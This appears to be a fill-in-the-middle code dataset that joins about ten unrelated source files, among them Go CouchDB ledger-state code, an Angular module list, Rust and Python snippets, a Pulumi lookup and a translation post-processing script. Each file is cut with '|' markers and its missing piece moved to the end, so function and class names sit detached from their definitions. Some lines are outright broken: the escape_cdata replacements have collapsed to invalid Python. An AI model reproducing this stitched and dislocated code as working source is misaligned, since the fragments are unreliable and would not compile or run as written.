if err := vdb.ensureFullCommitAndRecordSavepoint(height, namespaces); err != nil {
logger.Errorf("Error during recordSavepoint: %s", err.Error())
return err
}
wg.Wait()
select {
case err := <-errChan:
return errors.WithStack(err)
default:
return nil
}
}
// ClearCachedVersions clears committedVersions and revisionNumbers
func (vdb *VersionedDB) ClearCachedVersions() {
logger.Debugf("Clear Cache")
vdb.verCacheLock.Lock()
defer vdb.verCacheLock.Unlock()
vdb.committedDataCache = newVersionCache()
}
// Open implements method in VersionedDB interface
func (vdb *VersionedDB) Open() error {
// no need to open db since a shared couch instance is used
return nil
}
// Close implements method in VersionedDB interface
func (vdb *VersionedDB) Close() {
// no need to close db since a shared couch instance is used
}
// writeChannelMetadata saves channel metadata to metadataDB
func (vdb *VersionedDB) writeChannelMetadata() error {
couchDoc, err := encodeChannelMetadata(vdb.channelMetadata)
if err != nil {
return err
}
if _, err := vdb.metadataDB.saveDoc(channelMetadataDocID, "", couchDoc); err != nil {
return err
}
_, err = vdb.metadataDB.ensureFullCommit()
return err
}
// ensureFullCommitAndRecordSavepoint flushes all the dbs (corresponding to `namespaces`) to disk
// and Record a savepoint in the metadata db.
// Couch parallelizes writes in cluster or sharded setup and ordering is not guaranteed.
// Hence we need to fence the savepoint with sync. So ensure_full_commit on all updated
// namespace DBs is called before savepoint to ensure all block writes are flushed. Savepoint
// itself is flushed to the metadataDB.
func (vdb *VersionedDB) ensureFullCommitAndRecordSavepoint(height *version.Height, namespaces []string) error {
// ensure full commit to flush all changes on updated namespaces until now to disk
// namespace also includes empty namespace which is nothing but metadataDB
errsChan := make(chan error, len(namespaces))
defer close(errsChan)
var commitWg sync.WaitGroup
commitWg.Add(len(namespaces))
for _, ns := range namespaces {
go func(ns string) {
defer commitWg.Done()
db, err := vdb.getNamespaceDBHandle(ns)
if err != nil {
errsChan <- err
return
}
_, err = db.ensureFullCommit()
if err != nil {
errsChan <- err
return
}
}(ns)
}
commitWg.Wait()
select {
case err := <-errsChan:
logger.Errorf("Failed to perform full commit")
return errors.Wrap(err, "failed to perform full commit")
default:
logger.Debugf("All changes have been flushed to the disk")
}
// If a given height is nil, it denotes that we are committing pvt data of old blocks.
// In this case, we should not store a savepoint for recovery. The lastUpdatedOldBlockList
// in the pvtstore acts as a savepoint for pvt data.
if height == nil {
return nil
}
// construct savepoint document and save
savepointCouchDoc, err := encodeSavepoint(height)
if err != nil {
return err
}
_, err = vdb.metadataDB.saveDoc(savepointDocID, "", savepointCouchDoc)
if err != nil {
logger.Errorf("Failed to save the savepoint to DB %s", err.Error())
return err
}
// Note: Ensure full commit on metadataDB after storing the savepoint is not necessary
// as CouchDB syncs states to disk periodically (every 1 second). If peer fails before
// syncing the savepoint to disk, ledger recovery process kicks in to ensure consistency
// between CouchDB and block store on peer restart
return nil
}
// GetLatestSavePoint implements method in VersionedDB interface
func (vdb *VersionedDB) GetLatestSavePoint() (*version.Height, error) {
var err error
couchDoc, _, err := vdb.metadataDB.readDoc(savepointDocID)
if err != nil {
logger.Errorf("Failed to read savepoint data %s", err.Error())
return nil, err
}
// ReadDoc() not found (404) will result in nil response, in these cases return height nil
if couchDoc == nil || couchDoc.jsonValue == nil {
return nil, nil
}
return decodeSavepoint(couchDoc)
}
// readChannelMetadata returns channel metadata stored in metadataDB
func (vdb *VersionedDB) readChannelMetadata() (*channelMetadata, error) {
var err error
couchDoc, _, err := vdb.metadataDB.readDoc(channelMetadataDocID)
if err != nil {
logger.Errorf("Failed to read db name mapping data %s", err.Error())
return nil, err
}
// ReadDoc() not found (404) will result in nil response, in these cases return nil
if couchDoc == nil || couchDoc.jsonValue == nil {
return nil, nil
}
return decodeChannelMetadata(couchDoc)
}
// GetFullScanIterator implements method in VersionedDB interface. This function returns a
// FullScanIterator that can be used to iterate over entire data in the statedb for a channel.
// `skipNamespace` parameter can be used to control if the consumer wants the FullScanIterator
// to skip one or more namespaces from the returned results.
func (vdb *VersionedDB) GetFullScanIterator(skipNamespace func(string) bool) (statedb.FullScanIterator, byte, error) {
namespacesToScan := []string{}
for ns := range vdb.channelMetadata.NamespaceDBsInfo {
if skipNamespace(ns) {
continue
}
namespacesToScan = append(namespacesToScan, ns)
}
sort.Strings(namespacesToScan)
// if namespacesToScan is empty, we can return early with a nil FullScanIterator. However,
// the implementation of this method needs be consistent with the same method implemented in
// the stateleveldb pkg. Hence, we don't return a nil FullScanIterator by checking the length
// of the namespacesToScan.
dbsToScan := []*namespaceDB{}
for _, ns := range namespacesToScan {
db, err := vdb.getNamespaceDBHandle(ns)
if err != nil {
return nil, byte(0), errors.WithMessagef(err, "failed to get database handle for the namespace %s", ns)
}
dbsToScan = append(dbsToScan, &namespaceDB{ns, db})
}
// the database which belong to an empty namespace contains
// internal keys. The scanner must skip these keys.
toSkipKeysFromEmptyNs := map[string]bool{
savepointDocID: true,
channelMetadataDocID: true,
}
return newDBsScanner(dbsToScan, vdb.couchInstance.internalQueryLimit(), toSkipKeysFromEmptyNs)
}
// applyAdditionalQueryOptions will add additional fields to the query required for query processing
func applyAdditionalQueryOptions(queryString string, queryLimit int32, queryBookmark string) (string, error) {
const jsonQueryFields = "fields"
const jsonQueryLimit = "limit"
const jsonQueryBookmark = "bookmark"
//create a generic map for the query json
jsonQueryMap := make(map[string]interface{})
//unmarshal the selector json into the generic map
decoder := json.NewDecoder(bytes.NewBuffer([]byte(queryString)))
decoder.UseNumber()
err := decoder.Decode(&jsonQueryMap)
if err != nil {
return "", err
}
if fieldsJSONArray, ok := jsonQueryMap[jsonQueryFields]; ok {
switch fieldsJSONArray := fieldsJSONArray.(type) {
case []interface{}:
//Add the "_id", and "version" fields, these are needed by default
jsonQueryMap[jsonQueryFields] = append(fieldsJSONArray, idField, versionField)
default:
return "", errors.New("fields definition must be an array")
}
}
// Add limit
// This will override any limit passed in the query.
// Explicit paging not yet supported.
jsonQueryMap[jsonQueryLimit] = queryLimit
// Add the bookmark if provided
if queryBookmark != "" {
jsonQueryMap[jsonQueryBookmark] = queryBookmark
}
//Marshal the updated json query
editedQuery, err := json.Marshal(jsonQueryMap)
if err != nil {
return "", err
}
logger.Debugf("Rewritten query: %s", editedQuery)
return string(editedQuery), nil
}
type queryScanner struct {
namespace string
db *couchDatabase
queryDefinition *queryDefinition
paginationInfo *paginationInfo
resultsInfo *resultsInfo
exhausted bool
}
type queryDefinition struct {
startKey string
endKey string
query string
internalQueryLimit int32
}
type paginationInfo struct {
cursor int32
requestedLimit int32
bookmark string
}
type resultsInfo struct {
totalRecordsReturned int32
results []*queryResult
}
func newQueryScanner(namespace string, db *couchDatabase, query string, internalQueryLimit,
limit int32, bookmark, startKey, endKey string) (*queryScanner, error) {
scanner := &queryScanner{namespace, db, &queryDefinition{startKey, endKey, query, internalQueryLimit}, &paginationInfo{-1, limit, bookmark}, &resultsInfo{0, nil}, false}
var err error
// query is defined, then execute the query and return the records and bookmark
if scanner.queryDefinition.query != "" {
err = scanner.executeQueryWithBookmark()
} else {
err = scanner.getNextStateRangeScanResults()
}
if err != nil {
return nil, err
}
scanner.paginationInfo.cursor = -1
return scanner, nil
}
func (scanner *queryScanner) Next() (statedb.QueryResult, error) {
doc, err := scanner.next()
if err != nil {
return nil, err
}
if doc == nil {
return nil, nil
}
kv, err := couchDocToKeyValue(doc)
if err != nil {
return nil, err
}
scanner.resultsInfo.totalRecordsReturned++
return &statedb.VersionedKV{
CompositeKey: statedb.CompositeKey{
Namespace: scanner.namespace,
Key: kv.key,
},
VersionedValue: *kv.VersionedValue,
}, nil
}
func (scanner *queryScanner) next() (*couchDoc, error) {
if len(scanner.resultsInfo.results) == 0 {
return nil, nil
}
scanner.paginationInfo.cursor++
if scanner.paginationInfo.cursor >= scanner.queryDefinition.internalQueryLimit {
if scanner.exhausted {
return nil, nil
}
var err error
if scanner.queryDefinition.query != "" {
err = scanner.executeQueryWithBookmark()
} else {
err = scanner.getNextStateRangeScanResults()
}
if err != nil {
return nil, err
}
if len(scanner.resultsInfo.results) == 0 {
return nil, nil
}
}
if scanner.paginationInfo.cursor >= int32(len(scanner.resultsInfo.results)) {
return nil, nil
}
result := scanner.resultsInfo.results[scanner.paginationInfo.cursor]
return &couchDoc{
jsonValue: result.value,
attachments: result.attachments,
}, nil
}
func (scanner *queryScanner) Close() {}
func (scanner *queryScanner) GetBookmarkAndClose() string {
retval := ""
if scanner.queryDefinition.query != "" {
retval = scanner.paginationInfo.bookmark
} else {
retval = scanner.queryDefinition.startKey
}
scanner.Close()
return retval
}
func constructCacheValue(v *statedb.VersionedValue, rev string) *CacheValue {
return &CacheValue{
Version: v.Version.ToBytes(),
Value: v.Value,
Metadata: v.Metadata,
AdditionalInfo: []byte(rev),
}
}
func constructVersionedValue(cv *CacheValue) (*statedb.VersionedValue, error) {
height, _, err := version.NewHeightFromBytes(cv.Version)
if err != nil {
return nil, err
}
return &statedb.VersionedValue{
Value: cv.Value,
Version: height,
Metadata: cv.Metadata,
}, nil
}
type dbsScanner struct {
dbs []*namespaceDB
nextDBToScanIndex int
resultItr *queryScanner
currentNamespace string
prefetchLimit int32
toSkipKeysFromEmptyNs map[string]bool
}
type namespaceDB struct {
ns string
db *couchDatabase
}
func newDBsScanner(dbsToScan []*namespaceDB, prefetchLimit int32, toSkipKeysFromEmptyNs map[string]bool) (*dbsScanner, byte, error) {
if len(dbsToScan) == 0 {
return nil, fullScanIteratorValueFormat, nil
}
s := &dbsScanner{
dbs: dbsToScan,
prefetchLimit: prefetchLimit,
toSkipKeysFromEmptyNs: toSkipKeysFromEmptyNs,
}
if err := s.beginNextDBScan(); err != nil {
return nil, byte(0), err
}
return s, fullScanIteratorValueFormat, nil
}
func (s *dbsScanner) beginNextDBScan() error {
dbUnderScan := s.dbs[s.nextDBToScanIndex]
queryScanner, err := newQueryScanner(dbUnderScan.ns, dbUnderScan.db, "", s.prefetchLimit, 0, "", "", "")
if err != nil {
return errors.WithMessagef(
err,
"failed to create a query scanner for the database %s associated with the namespace %s",
dbUnderScan.db.dbName,
dbUnderScan.ns,
)
}
s.resultItr = queryScanner
s.currentNamespace = dbUnderScan.ns
s.nextDBToScanIndex++
return nil
}
// Next returns the key-values present in the namespaceDB. Once a namespaceDB
// is processed, it moves to the next namespaceDB till all are processed.
// The <version, value, metadata> is converted to []byte using a proto.
func (s *dbsScanner) Next() (*statedb.CompositeKey, []byte, error) {
if s == nil {
return nil, nil, nil
}
for {
couchDoc, err := s.resultItr.next()
if err != nil {
return nil, nil, errors.WithMessagef(
err,
"failed to retrieve the next entry from scanner associated with namespace %s",
s.currentNamespace,
)
}
if couchDoc == nil {
s.resultItr.Close()
if len(s.dbs) <= s.nextDBToScanIndex {
break
}
if err := s.beginNextDBScan(); err != nil {
return nil, nil, err
}
continue
}
if s.currentNamespace == "" {
key, err := couchDoc.key()
if err != nil {
return nil, nil, errors.WithMessagef(
err,
"failed to retrieve key from the couchdoc present in the empty namespace",
)
}
if s.toSkipKeysFromEmptyNs[key] {
continue
}
}
fields, err := validateAndRetrieveFields(couchDoc)
if err != nil {
return nil, nil, errors.WithMessagef(
err,
"failed to validate and retrieve fields from couch doc with id %s",
fields.id,
)
}
dbval, err := encodeValueVersionMetadata(fields.value, []byte(fields.versionAndMetadata))
if err != nil {
return nil, nil, errors.WithMessagef(
err,
"failed to encode value [%v] version and metadata [%v]",
fields.value,
fields.versionAndMetadata,
)
}
return &statedb.CompositeKey{
Namespace: s.currentNamespace,
Key: fields.id,
}, dbval, nil
}
return nil, nil, nil
}
func (s *dbsScanner) Close() {
if s == nil {
return
}
s.resultItr.Close()
}
| {
return err
} |
fundamental-ngx-core.module.ts | import { NgModule } from '@angular/core';
import { ActionBarModule } from './action-bar/action-bar.module';
import { AlertModule } from './alert/alert.module';
import { AlertService } from './alert/alert-service/alert.service';
import { BadgeLabelModule } from './badge-label/badge-label.module';
import { BarModule } from './bar/bar.module';
import { BreadcrumbModule } from './breadcrumb/breadcrumb.module';
import { BusyIndicatorModule } from './busy-indicator/busy-indicator.module';
import { ButtonModule } from './button/button.module';
import { CalendarModule } from './calendar/calendar.module';
import { ComboboxModule } from './combobox/combobox.module';
import { CheckboxModule } from './checkbox/checkbox.module';
import { DatePickerModule } from './date-picker/date-picker.module';
import { DatetimePickerModule } from './datetime-picker/datetime-picker.module';
import { FileInputModule } from './file-input/file-input.module';
import { FormModule } from './form/form.module';
import { IconModule } from './icon/icon.module';
import { IdentifierModule } from './identifier/identifier.module';
import { ImageModule } from './image/image.module';
import { InfiniteScrollModule } from './infinite-scroll/infinite-scroll.module';
import { InlineHelpModule } from './inline-help/inline-help.module';
import { InputGroupModule } from './input-group/input-group.module';
import { ListModule } from './list/list.module';
import { LoadingSpinnerModule } from './loading-spinner/loading-spinner.module';
import { MenuModule } from './menu/menu.module';
import { DialogModule } from './dialog/dialog.module';
import { DialogService } from './dialog/dialog-service/dialog.service';
import { MessageStripModule } from './message-strip/message-strip.module';
import { MultiInputModule } from './multi-input/multi-input.module';
import { PaginationModule } from './pagination/pagination.module';
import { PanelModule } from './panel/panel.module';
import { PopoverModule } from './popover/popover.module';
import { ScrollSpyModule } from './scroll-spy/scroll-spy.module';
import { ShellbarModule } from './shellbar/shellbar.module';
import { SideNavigationModule } from './side-navigation/side-navigation.module';
import { SelectModule } from './select/select.module';
import { SplitButtonModule } from './split-button/split-button.module';
import { TableModule } from './table/table.module';
import { TabsModule } from './tabs/tabs.module';
import { TileModule } from './tile/tile.module';
import { TreeModule } from './tree/tree.module';
import { TimeModule } from './time/time.module';
import { TimePickerModule } from './time-picker/time-picker.module';
import { SegmentedButtonModule } from './segmented-button/public_api';
import { SwitchModule } from './switch/switch.module';
import { TokenModule } from './token/token.module';
import { CommonModule } from '@angular/common';
import { FormsModule } from '@angular/forms';
import { LocalizationEditorModule } from './localizator-editor/localization-editor.module';
import { MegaMenuModule } from './mega-menu/mega-menu.module';
import { LayoutGridModule } from './layout-grid/layout-grid.module';
import { DragAndDropModule } from './utils/drag-and-drop/drag-and-drop.module';
import { ProductSwitchModule } from './product-switch/product-switch.module';
import { NotificationModule } from './notification/notification.module';
import { NotificationService } from './notification/notification-service/notification.service';
import { NestedListModule } from './nested-list/nested-list.module';
import { RadioModule } from './radio/radio.module';
import { LinkModule } from './link/link.module';
import { InfoLabelModule } from './info-label/info-label.module';
import { ObjectStatusModule } from './object-status/object-status.module';
import { MultiInputMobileModule } from './multi-input/multi-input-mobile/multi-input-mobile.module';
@NgModule({
imports: [CommonModule, FormsModule],
exports: [
ActionBarModule,
AlertModule,
BadgeLabelModule,
BarModule,
BreadcrumbModule,
BusyIndicatorModule,
ButtonModule,
SegmentedButtonModule,
CalendarModule,
ComboboxModule,
CheckboxModule,
DatePickerModule,
DatetimePickerModule,
DragAndDropModule,
FileInputModule,
FormModule,
IconModule,
IdentifierModule,
ImageModule,
InfoLabelModule,
InlineHelpModule,
IdentifierModule,
InfiniteScrollModule,
InputGroupModule,
LayoutGridModule,
LinkModule,
ListModule,
LoadingSpinnerModule,
LocalizationEditorModule,
MenuModule,
MegaMenuModule,
DialogModule,
MessageStripModule,
MultiInputModule,
MultiInputMobileModule,
NestedListModule,
NotificationModule,
ObjectStatusModule,
PaginationModule,
PanelModule,
ProductSwitchModule,
PopoverModule,
RadioModule,
ScrollSpyModule,
SegmentedButtonModule,
SelectModule,
ShellbarModule,
SideNavigationModule,
SplitButtonModule,
TableModule,
TabsModule,
TileModule,
TimeModule,
TimePickerModule,
SwitchModule,
TokenModule,
TreeModule
],
providers: [AlertService, DialogService, NotificationService]
})
export class | {}
| FundamentalNgxCoreModule |
linux.rs | use errno;
use std::{
error,
fmt,
path,
ffi,
os,
};
use crate::error::Result;
extern {
fn linux_xch_syscall(path1: *const os::raw::c_char, path2: *const os::raw::c_char) -> os::raw::c_long;
}
pub fn xch<A: AsRef<path::Path>, B: AsRef<path::Path>>(path1: A, path2: B) -> Result<()> {
use std::os::unix::ffi::OsStrExt;
let path1 = path1.as_ref().as_os_str().as_bytes();
let path2 = path2.as_ref().as_os_str().as_bytes();
let path1 = ffi::CString::new(path1).expect("path cannot contain null byte");
let path2 = ffi::CString::new(path2).expect("path cannot contain null byte");
let ret = unsafe {
linux_xch_syscall(path1.as_ptr(), path2.as_ptr())
};
if ret == 0 {
Ok(())
} else {
Err(PlatformError(errno::errno()).into())
}
}
#[derive(Debug)]
pub struct PlatformError(errno::Errno);
impl fmt::Display for PlatformError {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "{}", self.0)
}
}
impl error::Error for PlatformError {
fn | (&self) -> &str {
"OSError"
}
}
| description |
languages.rs | use markup;
use crate::handlers::admin::{
languages_get::AgoLanguages,
scope_languages::new_get::ra_languages_new,
scope_languages::edit_get::ra_languages_edit_w_id,
};
use crate::i18n::{
translate_i18n::TranslateI18N,
t_date::t_date,
};
use crate::templates::{
admin_layout::AdminLayout,
widgets::admin_panel::AdminPanel,
widgets::admin_lang_dropdown::AdminLangDropdown,
};
markup::define! {
Languages<'a>(
domain: &'a str,
title: &'a str,
q: &'a AgoLanguages,
t: &'a TranslateI18N,
success: &'a bool,
) {
@AdminLayout {
domain: domain,
title: title,
data: &q.data,
routes: &q.routes,
content: AdminPanel {
content: Content {
q: q,
t: t,
success: success,
},
current_page: "languages",
data: &q.data,
t: t,
},
}
}
Content<'a>(
q: &'a AgoLanguages,
t: &'a TranslateI18N,
success: &'a bool,
) {
div[class = "box is-marginless mb-6"] {
h1[class = "title"] {
@t.languages
@if q.data.languages.iter().len() > 1 {
div[class = "is-pulled-right"] {
@AdminLangDropdown {
routes: &q.routes,
data: &q.data,
}
}
}
a[
href = ra_languages_new(&q.data.lang.code),
class = "button is-link is-pulled-right \
has-text-weight-normal mr-4",
] {
@t.add_language
}
}
@if **success {
div[
class = "notification is-success",
] {
button[class = "delete"] {}
@t.your_website_languages_were_successfully_updated
}
}
@if q.some_lang_without_names {
div[
class = "notification is-danger",
] {
button[class = "delete"] {}
@t.there_are_languages_without_names
}
}
table[
class = "table is-bordered is-hoverable is-fullwidth",
] {
thead {
tr {
th {
@t.language
}
th {
@t.code
}
th {
@t.last_update
}
}
}
tbody {
@for lang in q.data.languages.iter() {
tr[
class = if !lang.has_all_names {
"has-background-danger-light"
} else {
""
},
] {
td {
a[
href = ra_languages_edit_w_id(
&q.data.lang.code,
&lang.id,
),
class = if !lang.has_all_names {
"has-text-danger"
} else {
""
},
] { | @if lang.id != q.data.lang.id {
" ("
@lang.original_name
")"
}
}
}
td {
@lang.code
}
td {
{t_date(&lang.date, &q.data.lang.code)}
}
}
}
}
}
}
}
} | @lang.name
|
test.py | from PyQt4 import QtCore, QtGui
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.central_widget = QtGui.QStackedWidget()
self.setCentralWidget(self.central_widget)
login_widget = LoginWidget(self)
login_widget.button.clicked.connect(self.login)
self.central_widget.addWidget(login_widget)
def login(self):
|
class LoginWidget(QtGui.QWidget):
def __init__(self, parent=None):
super(LoginWidget, self).__init__(parent)
layout = QtGui.QHBoxLayout()
self.button = QtGui.QPushButton('Login')
layout.addWidget(self.button)
self.setLayout(layout)
# you might want to do self.button.click.connect(self.parent().login) here
class LoggedWidget(QtGui.QWidget):
def __init__(self, parent=None):
super(LoggedWidget, self).__init__(parent)
layout = QtGui.QHBoxLayout()
self.label = QtGui.QLabel('logged in!')
layout.addWidget(self.label)
self.setLayout(layout)
if __name__ == '__main__':
app = QtGui.QApplication([])
window = MainWindow()
window.show()
app.exec_() | logged_in_widget = LoggedWidget(self)
self.central_widget.addWidget(logged_in_widget)
self.central_widget.setCurrentWidget(logged_in_widget) |
main.rs | use std::fs;
use std::io::prelude::*;
use std::net::TcpListener;
use std::net::TcpStream;
fn main() {
let ecouteur = TcpListener::bind("127.0.0.1:7878").unwrap();
for flux in ecouteur.incoming() {
let flux = flux.unwrap();
gestion_connexion(flux);
}
}
fn | (mut flux: TcpStream) {
let mut tampon = [0; 1024];
flux.read(&mut tampon).unwrap();
let get = b"GET / HTTP/1.1\r\n";
if tampon.starts_with(get) {
let contenu = fs::read_to_string("hello.html").unwrap();
let reponse = format!(
"HTTP/1.1 200 OK\r\nContent-Length: {}\r\n\r\n{}",
contenu.len(),
contenu
);
flux.write(reponse.as_bytes()).unwrap();
flux.flush().unwrap();
} else {
let ligne_statut = "HTTP/1.1 404 NOT FOUND";
let contenu = fs::read_to_string("404.html").unwrap();
let reponse = format!(
"{}\r\nContent-Length: {}\r\n\r\n{}",
ligne_statut,
contenu.len(),
contenu
);
flux.write(reponse.as_bytes()).unwrap();
flux.flush().unwrap();
}
}
| gestion_connexion |
getVirtualNetwork.go | // *** WARNING: this file was generated by the Pulumi SDK Generator. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package v20160515
import (
"github.com/pulumi/pulumi/sdk/v3/go/pulumi"
)
func LookupVirtualNetwork(ctx *pulumi.Context, args *LookupVirtualNetworkArgs, opts ...pulumi.InvokeOption) (*LookupVirtualNetworkResult, error) {
var rv LookupVirtualNetworkResult
err := ctx.Invoke("azure-native:devtestlab/v20160515:getVirtualNetwork", args, &rv, opts...)
if err != nil {
return nil, err | }
return &rv, nil
}
type LookupVirtualNetworkArgs struct {
Expand *string `pulumi:"expand"`
LabName string `pulumi:"labName"`
Name string `pulumi:"name"`
ResourceGroupName string `pulumi:"resourceGroupName"`
}
// A virtual network.
type LookupVirtualNetworkResult struct {
AllowedSubnets []SubnetResponse `pulumi:"allowedSubnets"`
CreatedDate string `pulumi:"createdDate"`
Description *string `pulumi:"description"`
ExternalProviderResourceId *string `pulumi:"externalProviderResourceId"`
ExternalSubnets []ExternalSubnetResponse `pulumi:"externalSubnets"`
Id string `pulumi:"id"`
Location *string `pulumi:"location"`
Name string `pulumi:"name"`
ProvisioningState *string `pulumi:"provisioningState"`
SubnetOverrides []SubnetOverrideResponse `pulumi:"subnetOverrides"`
Tags map[string]string `pulumi:"tags"`
Type string `pulumi:"type"`
UniqueIdentifier *string `pulumi:"uniqueIdentifier"`
} | |
test_run.py | #!/usr/bin/python
#
# Copyright 2019 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
from __future__ import absolute_import, division, print_function
from unittest import TestCase
import pytest
from polyaxon_sdk import V1Run
from polyaxon.managers.run import RunManager
@pytest.mark.managers_mark
class | (TestCase):
def test_default_props(self):
assert RunManager.IS_GLOBAL is False
assert RunManager.IS_POLYAXON_DIR is True
assert RunManager.CONFIG_FILE_NAME == ".polyaxonrun"
assert RunManager.CONFIG == V1Run
| TestRunManager |
update-translations.py | #!/usr/bin/env python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
from __future__ import division, print_function | import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'ionos_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
# Minimum number of messages for translation to be considered at all
MIN_NUM_MESSAGES = 10
def check_at_repository_root():
if not os.path.exists('.git'):
print('No .git directory found')
print('Execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([TX, 'pull', '-f', '-a']):
print('Error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''Find all format specifiers in a string.'''
pos = 0
specifiers = []
while True:
percent = s.find('%', pos)
if percent < 0:
break
try:
specifiers.append(s[percent+1])
except:
print('Failed to get specifier')
pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''Split format specifiers between numeric (Qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# If both numeric format specifiers and "others" are used, assume we're dealing
# with a Qt-formatted message. In the case of Qt formatting (see https://doc.qt.io/qt-5/qstring.html#arg)
# only numeric formats are replaced at all. This means "(percentage: %1%)" is valid, without needing
# any kind of escaping that would be necessary for strprintf. Without this, this function
# would wrongly detect '%)' as a printf format specifier.
if numeric:
other = []
# numeric (Qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
def sanitize_string(s):
'''Sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors, numerus):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both Qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except IndexError:
errors.append("Parse error in translation for '%s': '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
else:
if source_f != translation_f:
if numerus and source_f == (set(), ['n']) and translation_f == (set(), []) and translation.find('%') == -1:
# Allow numerus translations to omit %n specifier (usually when it only has one possible value)
return True
errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
return True
def all_ts_files(suffix=''):
for filename in os.listdir(LOCALE_DIR):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(LOCALE_DIR, filename)
yield(filename, filepath)
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''Remove invalid characters from translation string'''
return FIX_RE.sub(b'', s)
# Override cdata escape function to make our output match Qt's (optional, just for cleaner diffs for
# comparison, disable by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
text = text.replace("'", ''')
text = text.replace('"', '"')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('Checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = ET._escape_cdata
ET._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
parser = ET.XMLParser(encoding='utf-8') # need to override encoding because 'utf8' is not understood only 'utf-8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the XML parser will fail
data = remove_invalid_characters(data)
tree = ET.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors, numerus)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = True
# Remove location tags
for location in message.findall('location'):
message.remove(location)
# Remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# check if document is (virtually) empty, and remove it if so
num_messages = 0
for context in root.findall('context'):
for message in context.findall('message'):
num_messages += 1
if num_messages < MIN_NUM_MESSAGES:
print('Removing %s, as it contains only %i messages' % (filepath, num_messages))
continue
# write fixed-up tree
# if diff reduction requested, replace some XML to 'sanitize' to qt formatting
if reduce_diff_hacks:
out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
fetch_all_translations()
postprocess_translations() | import subprocess
import re |
algo_mdo_tit_for_2_tat.py | # Author: Mark Olson 2021-11-06 https://github.com/Mark-MDO47/PrisonDilemmaTourney
#
# algo_mdo_tit_for_2_tat.py - Prisoner's Dilemma tournament algorithm file
#
# The algo_mdo_tit_for_2_tat algorithm behaves as follows:
# On the first two moves it returns choices.COOPERATE
# On all subsequent moves:
# if the opponent did choices.DEFECT within the last two moves, it returns choices.DEFECT this move
# else it returns choices.COOPERATE this move
#
# For an algorithm python routine in a file (i.e. with filename algo_mdo_something.py), the calling sequence is
# algo_mdo_something(selfHist, oppHist, ID))
# I recommend adding your initials (mine are mdo) to your file/algorithm name so we don't have name collisions
# NOTE that the function name is the same as the python filename with the *.py removed
# This template file is named algorithm_template.py so the function name is algorithm_template
# Each call to the algorithm will have the following for parameters:
# list of history all the choices made by both parties in reverse order (latest choice before this is [0], prev [1])
# Thus the opponent choice made in previous move, assuming this isn't the first move, is oppChoices[0].
# if len(oppChoices) > 0, there was at least one prior move.
# note: len(oppChoices) should be identical to len(myChoices)
# value of each entry in xxxHist is one of choices.DEFECT or choices.COOPERATE
#
# The algorithm will return
# choices.DEFECT or choices.COOPERATE
#
# See https://en.wikipedia.org/wiki/Prisoner%27s_dilemma
# See https://cs.stanford.edu/people/eroberts/courses/soco/projects/1998-99/game-theory/axelrod.html
#
# Merrill Flood and Melvin Dresher from RAND corporation framed the concept in 1950 to show why two completely rational
# individuals might not cooperate, even if it appears that it is in their best interests to do so.
#
